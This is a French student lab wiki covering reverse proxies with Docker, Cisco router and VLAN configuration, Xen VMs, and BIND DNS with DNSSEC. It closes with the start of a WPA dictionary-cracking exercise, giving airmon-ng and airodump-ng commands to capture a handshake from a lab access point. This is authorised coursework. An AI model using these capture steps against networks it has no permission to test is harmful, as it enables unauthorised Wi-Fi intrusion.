  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
  xl create Dionysos.cfg&lt;br /&gt;
  xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
Dans /root/.profile&lt;br /&gt;
  &lt;br /&gt;
  http_proxy=&amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
  https_proxy=&amp;quot;https://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
  xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
